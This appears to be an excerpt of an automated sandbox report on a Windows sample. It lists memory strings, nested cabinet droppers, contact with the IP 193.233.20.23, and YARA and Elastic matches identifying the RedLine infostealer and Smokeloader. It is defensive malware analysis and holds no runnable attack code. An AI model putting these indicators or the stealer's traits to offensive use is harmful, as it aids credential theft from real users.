                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: kLL28QE.exe, kLL28QE.exe, 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknown TCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: kLL28QE.exe, 00000006.00000002.408891650.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    Source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4a47da6.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.3.kLL28QE.exe.3170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.71b0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.71b0000.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30000.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4a47da6.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.3120e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.kLL28QE.exe.4a46ebe.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E73BA20_2_00E73BA2
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E75C9E0_2_00E75C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E3BA21_2_003E3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E5C9E1_2_003E5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E3BA22_2_000E3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E5C9E2_2_000E5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A63BA23_2_00A63BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A65C9E3_2_00A65C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00408C606_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040DC116_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00407C3F6_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00418CCC6_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00406CA06_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004028B06_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041A4BE6_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004182446_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004016506_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00402F206_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004193C46_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004187886_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00402F896_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00402B906_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004073A06_2_004073A0
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe 5E952D469BEF765647688D773A962727577618618B9C121AD86EF64D3BC2860E
                    Source: y0EWt2mE9h.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4a47da6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.3.kLL28QE.exe.3170000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.71b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.71b0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.3.kLL28QE.exe.2fb5b78.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4b30ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4a47da6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.3120e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.kLL28QE.exe.4a46ebe.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E71F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00E71F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_003E1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_000E1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A61F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00A61F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: y0EWt2mE9h.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 960128 bytes, 2 files, at 0x2c +A "shS06Up82.exe" +A "rTV61uz75.exe", ID 2177, number 1, 36 datablocks, 0x1503 compression
                    Source: shS06Up82.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 772896 bytes, 2 files, at 0x2c +A "sSH13Pp30.exe" +A "nNy98cB79.exe", ID 2096, number 1, 33 datablocks, 0x1503 compression
                    Source: sSH13Pp30.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 543088 bytes, 2 files, at 0x2c +A "smi53cv51.exe" +A "mzc23WZ.exe", ID 2096, number 1, 22 datablocks, 0x1503 compression
                    Source: smi53cv51.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 252546 bytes, 2 files, at 0x2c +A "iGb20db.exe" +A "kLL28QE.exe", ID 1821, number 1, 12 datablocks, 0x1503 compression
                    Source: smi53cv51.exe.2.drStatic PE information: Resource name: RT_RCDATA type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.0
                    Source: y0EWt2mE9h.exe, 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs y0EWt2mE9h.exe
                    Source: y0EWt2mE9h.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs y0EWt2mE9h.exe
                    Source: y0EWt2mE9h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iGb20db.exe.log
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E73FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00E73FEF
